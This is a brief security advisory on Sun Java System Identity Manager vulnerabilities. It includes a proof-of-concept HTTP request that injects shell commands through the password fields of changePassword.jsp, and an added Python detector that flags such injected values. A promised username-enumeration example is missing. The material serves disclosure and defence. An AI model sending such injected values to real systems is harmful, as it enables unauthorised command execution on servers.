Sun Java System Identity Manager Multiple Vulnerabilities

For some issues, an attacker may use a browser or entice an unsuspecting user into following a malicious URI.

The following example request is available for the command-injection issue:

POST /idm/user/changePassword.jsp?lang=en&cntry=US HTTP/1.1
id=***&command=Save&activeControl=&resourceAccounts.selectAll=true&
resourceAccounts.password=id>/x%0aid>/x&resourceAccounts.confirmPassword=id>/x%0aid>/x
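As an added defensive example (not part of the SecurityFocus advisory), the following Python inspects application/x-www-form-urlencoded bodies of changePassword.jsp requests like the one above and flags password parameters that carry URL-encoded newlines or shell metacharacters once decoded; the sample bodies are constructed, and the metacharacter set is an assumed heuristic for a WAF or log-review rule.

```python
import re
from urllib.parse import parse_qs

# Form parameters of changePassword.jsp whose values are forwarded to the
# managed resource (names taken from the advisory's example request).
PASSWORD_PARAMS = ("resourceAccounts.password", "resourceAccounts.confirmPassword")

# Assumed heuristic: a password should never contain a newline or carriage
# return (the %0a separator used in the proof of concept) or shell redirection
# and command-chaining characters.
SUSPICIOUS = re.compile(r"[\r\n;|&`$<>]")

def inspect_body(body: str) -> list[str]:
    """Return a finding per password parameter that contains metacharacters."""
    findings = []
    # parse_qs URL-decodes values, so %0a becomes a real newline here.
    params = parse_qs(body, keep_blank_values=True)
    for name in PASSWORD_PARAMS:
        for value in params.get(name, []):
            hits = sorted(set(SUSPICIOUS.findall(value)))
            if hits:
                findings.append(f"{name}: metacharacters {hits!r} in value {value!r}")
    return findings

# Constructed sample bodies: "poc" mirrors the advisory's example request,
# "benign" is an ordinary password change that must not be flagged.
SAMPLES = {
    "poc": "id=***&command=Save&activeControl=&resourceAccounts.selectAll=true&"
           "resourceAccounts.password=id>/x%0aid>/x&resourceAccounts.confirmPassword=id>/x%0aid>/x",
    "benign": "id=***&command=Save&resourceAccounts.password=Correct-Horse-42&"
              "resourceAccounts.confirmPassword=Correct-Horse-42",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, inspect_body(body) or "clean")
```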

The following example is available to trigger the username-enumeration issue:

Copyright 2010, SecurityFocus